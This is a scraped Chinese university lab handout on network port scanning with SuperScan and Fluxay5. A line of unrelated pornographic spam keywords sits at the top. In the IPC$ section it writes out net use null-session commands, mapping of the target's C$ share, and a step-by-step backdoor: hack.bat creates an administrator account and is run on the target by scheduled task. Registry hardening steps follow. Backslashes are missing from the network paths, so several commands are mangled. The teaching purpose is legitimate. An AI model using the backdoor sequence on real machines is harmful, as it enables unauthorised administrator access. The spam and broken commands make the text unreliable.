卖逼视频免费看片|狼人就干网中文字慕|成人av影院导航|人妻少妇精品无码专区二区妖婧|亚洲丝袜视频玖玖|一区二区免费中文|日本高清无码一区|国产91无码小说|国产黄片子视频91sese日韩|免费高清无码成人网站入口

實驗2 網(wǎng)絡掃描及安全評估實驗

HUNAN UNIVERSITY《信息安全原理》實驗報告實驗二 網(wǎng)絡掃描及安全評估實驗一、實驗目的掌握網(wǎng)絡端口掃描器的使用方法,熟悉常見端口和其對應的服務程序,掌握發(fā)現(xiàn)系統(tǒng)漏洞的方法。

HUNAN UNIVERSITY

《信息安全原理》實驗報告

實驗二 網(wǎng)絡掃描及安全評估實驗

一、實驗目的

掌握網(wǎng)絡端口掃描器的使用方法,熟悉常見端口和其對應的服務程序,掌握發(fā)現(xiàn)系統(tǒng)漏洞的方法。

,

● 掌握綜合掃描及安全評估工具的使用方法,了解進行簡單系統(tǒng)漏洞入侵的方法,了解常

見的網(wǎng)絡和系統(tǒng)漏洞以及其安全防護方法。

二、實驗原理 ● 端口掃描原理

● 端口掃描向目標主機的TCP/IP服務端口發(fā)送探測數(shù)據(jù)包,并記錄目標主機的響應。

通過分析響應來判斷服務端口是打開還是關(guān)閉,就可以得知端口提供的服務或信息。

● 端口掃描主要有經(jīng)典的掃描器(全連接)、SYN (半連接)掃描器、秘密掃描等。 ● 全連接掃描:掃描主機通過TCP/IP協(xié)議的三次握手與目標主機的指定端口建立一

次完整的連接。建立連接成功則響應掃描主機的SYN/ACK連接請求,這一響應表明目標端口處于監(jiān)聽(打開)的狀態(tài)。如果目標端口處于關(guān)閉狀態(tài),則目標主機會向掃描主機發(fā)送RST 的響應。

● 半連接(SYN )掃描 :若端口掃描沒有完成一個完整的TCP 連接,在掃描主機和目

標主機的一指定端口建立連接時候只完成了前兩次握手,在第三步時,掃描主機中斷了本次連接,使連接沒有完全建立起來,這樣的端口掃描稱為半連接掃描,也稱為間接掃描。

● TCP FIN(秘密)掃描:掃描方法的思想是關(guān)閉的端口會用適當?shù)腞ST 來回復FIN

數(shù)據(jù)包。另一方面,打開的端口會忽略對FIN 數(shù)據(jù)包的回復。

● 綜合掃描和安全評估技術(shù)工作原理

● 獲得主機系統(tǒng)在網(wǎng)絡服務、版本信息、Web 應用等相關(guān)信息,然后采用模擬攻擊的

方法,對目標主機系統(tǒng)進行攻擊性的安全漏洞掃描,如果模擬攻擊成功,則視為漏洞存在。最后根據(jù)檢測結(jié)果向系統(tǒng)管理員提供周密可靠的安全性分析報告。

三、實驗環(huán)境

,

● 實驗室所有機器安裝了Windows 操作系統(tǒng),并組成了一個局域網(wǎng),并且都安裝了

SuperScan 端口掃描工具和流光Fluxay5綜合掃描工具。

● 每兩個學生為一組:互相進行端口掃描和綜合掃描實驗。

四、實驗內(nèi)容和步驟

● 任務一:使用Superscan 端口掃描工具并分析結(jié)果

● 任務二:使用綜合掃描工具Fluxay5并分析結(jié)果

● 撰寫實驗報告

任務一:使用Superscan 端口掃描工具并分析結(jié)果

Superscan使用簡介:

任務一:使用Superscan 端口掃描工具并分析結(jié)果(續(xù))

選擇【Port list setup】,進行端口列表設置

,

掃描結(jié)果分析

任務一:使用Superscan 端口掃描工具并分析結(jié)果(續(xù))

,

分組角色:學生A 、學生B 互相掃描對方主機。

實驗步驟:

(1)在命令符提示下輸入IPCONFIG 查詢自己的IP 地址。

(2)在Superscan 中的Hostname Lookup 欄中,輸入同組學生主機的IP 地址,可通過單擊Lookup 按鈕獲得主機名。

(3)設置IP 欄、Scan type 欄、Scan 欄,使其對同組學生主機的所有端口以默認的時間參數(shù)進行掃描。

(4)根據(jù)掃描結(jié)果分析主機開放的端口類型和對應的服務程序。

(5)通過“控制面板”的“管理工具”中的“服務”配置 ,嘗試關(guān)閉或開放目標主機上的部分服務,重新掃描,觀察掃描結(jié)果的變化。

任務一:使用Superscan 端口掃描工具并分析結(jié)果(續(xù))

● 常見端口的關(guān)閉方法:

● 1、關(guān)閉7.9等端口:關(guān)閉Simple TCP/IP Service, 支持以下 TCP/IP 服務:Character

Generator, Daytime, Discard, Echo, 以及 Quote of the Day。

2、關(guān)閉80端口:關(guān)掉WWW 服務。在“服務”中顯示名稱為“World Wide Web Publishing Service ”,通過 Internet 信息服務的管理單元提供 Web 連接和管理。

3、關(guān)掉25端口:關(guān)閉Simple Mail Transport Protocol (SMTP)服務,它提供的功能是跨網(wǎng)傳送電子郵件。

4、關(guān)掉21端口:關(guān)閉FTP Publishing Service,它提供的服務是通過 Internet 信息服務的管理單元提供 FTP 連接和管理。

5、關(guān)掉23端口:關(guān)閉Telnet 服務,它允許遠程用戶登錄到系統(tǒng)并且使用命令行運行控制臺程序。

6、關(guān)掉139端口,139端口是NetBIOS Session 端口,用來文件和打印共享, 關(guān)閉139口聽方法是在“網(wǎng)絡和撥號連接”中“本地連接”中選取“Internet 協(xié)議(TCP/IP)”屬性,進入“高級TCP/IP設置”“WINS 設置”里面有一項“禁用TCP/IP的NETBIOS ”,打勾就關(guān)閉了139端口。

● 利用TCP/IP篩選:網(wǎng)上鄰居屬性-本地連接屬性-常規(guī)-internet 協(xié)議 (TCP/IP)屬性-

高級-選項-TCP/IP篩選-屬性-TCP 端口-只允許139,445,這樣其他端口都被關(guān)閉了。

任務二:使用流光Fluxay5綜合掃描工具并分析結(jié)果

,

各部份功能:

1: 暴力破解的設置區(qū)域

2:控制臺輸出

3:掃描出來的典型漏洞列表

4:掃描或者暴力破解成功的用戶帳號

5:掃描和暴力破解的速度控制

6:掃描和暴力破解時的狀態(tài)顯示

7:中止按鈕

8:探測記錄查找

任務二:使用流光Fluxay5綜合掃描工具并分析結(jié)果(續(xù))

,

選擇“文件(F )”→“高級掃描向?qū)В╓ )”可打開高級掃描向?qū)?,設置掃描參數(shù) 。 掃描結(jié)束后,流光會自動打開HTML 格式的掃描報告,

而且還把可利用的主機列在流光界面的最下方,如圖1所示。

圖1

單擊主機列表中的主機便可以直接對目標主機進行連接操作,如圖2所示。

圖2

,

除了使用“高級掃描向?qū)А迸渲酶呒墥呙柰?,還可以在探測菜單中直接選取高級掃描工具設置:

分組角色:學生A 、學生B 互相掃描對方主機。

實驗步驟:

(1)開放FTP 服務,允許匿名連接。

(2)打開流光FLUXAY5工具,使用“高級掃描向?qū)А边M行設置,使其能對同組學生主機的全部端口、服務、漏洞、所有用戶等進行全面的掃描。

(3)仔細觀察掃描結(jié)果,分析同組學生主機上存在的各種漏洞。

(4)根據(jù)掃描結(jié)果分析FTP 漏洞:如結(jié)果顯示有漏洞,則利用“流光”提供的入侵菜單進行FTP 連接,嘗試上傳或下載文件。

(5)根據(jù)掃描結(jié)果分析IPC$漏洞:

IPC 是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的權(quán)限,在遠程管理計算機和查看計算機的共享資源時使用。利用IPC$,連接者可以與目標主機建立一個空連接而無需用戶名和密碼,從而可以得到目標主機上的用戶列表,并可能破解用戶密碼。

IPC$相關(guān)命令:

● 建立和目標的ipc$連接命令:net use 目標IPipc$ “密碼” /user:“ADMIN ”

(管理員賬號),如:net use 2.168.27.128ipc$ “” /user:"administrator" ● 映射網(wǎng)絡驅(qū)動器命令(將目標主機的盤映射到本地磁盤 ):net use 本地盤符

目標IP 盤符$,如:net use z: 2.168.27.128c$

● 和目標建立了ipc$后,則可直接用IP 加盤符加$訪問。比如:copy 文件名 IP

盤符$路徑文件名,如:copy hack.bat 2.168.27.128c$,也可直接對映射為本地磁盤的網(wǎng)絡驅(qū)動器操作。

● 管理計算機上面的賬號命令:net user

● 查看賬號命令:net user

● 建立賬號命令:net user name passwd /add(net user sysbak 123456 /add :

添加用戶名為sysback ,密碼為123456的賬號 )

刪除賬號命令:net user name /delete

● 管理工作組命令:net localgroup 組名 用戶名 /add[delete]

● 如:net localgroup administrators sysback /add。該命令表示把sysback

用戶添加到管理員組(administrators )。

● 查看目標計算機的系統(tǒng)時間:net time ip

,

● 在遠程主機上建立計劃任務:at IP TIME COMMAND

● at 2.168.27.128 13:45 c:hack.bat (該命令表示在下午13點45分執(zhí)

行目標主機C 盤中的hack.bat 文件, 時間一定要晚于當前遠程主機系統(tǒng)時間) ● 刪除和目標的ipc$連接命令: net use IPipc$ /del

● 斷開所有IPC$連接: net use * /del

● 禁止建立空連接 :運行regedit ,找到主鍵[HKEY_LOCAL_MACHINE SYSTEM

CurrentControlSet Control LSA] ,把RestrictAnonymous (DWORD )的鍵值改為:00000001。

禁止自動打開默認共享 :找到主鍵

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters],把AutoShareServer (DWORD )的鍵值改為:00000000,

如果不存在,就新建一個再改鍵值。

● 利用破解的用戶ADMINISTRATOR 對目標主機進行留后門入侵,步驟:

● 編寫批處理文件hack.bat ,文件中包含兩個命令:1)建立一個新賬號,2)將新

賬號加入administrators 組。

● 使用net 命令與目標主機建立連接

● 將批處理文件hack.back 拷貝至目標主機上。

● 通過計劃任務使目標主機執(zhí)行hack.bat 文件。

● 斷開所有IPC$連接。

● 通過采用新賬號與目標主機建立連接來驗證賬號是否成功建立。

● 刪除和目標主機的連接。

● 執(zhí)行安全防護措施:

● 目標主機對注冊表進行修改:禁止建立空連接,禁止自動打開默認共享 ● 重新使用net 命令與目標主機建立連接,觀察結(jié)果是否有變化。

實驗報告要求

內(nèi)容:

一、根據(jù)任務一的掃描結(jié)果,寫出主機開放的端口類型和服務。同時寫出嘗試關(guān)閉或開放目標主機上的部分服務后重新掃描的新結(jié)果。

二、根據(jù)任務二的掃描結(jié)果,記錄被掃描方的用戶列表、提供的服務、共享的目錄和已經(jīng)存在的漏洞,分析這些漏洞,寫出是系統(tǒng)哪方面設置防范不合理造成的,寫出解決措施。

,

實驗結(jié)果:

1. 使用Superscan 端口掃描工具

在使用軟件之前,我們先來看看軟件的全貌(圖一)

圖一

界面比較復雜,我們根據(jù)共享功能來介紹使用。

一)域名(主機名)和IP 相互轉(zhuǎn)換

這個功能的作用就是取得域名比如:163.com 的IP ;或者根據(jù)IP :202.106.185.77取得域名。

在SuperScan 里面,有兩種方法來實現(xiàn)此功能:

(1)通過Hostname Lookup來實現(xiàn)(如圖二)

圖二

標簽: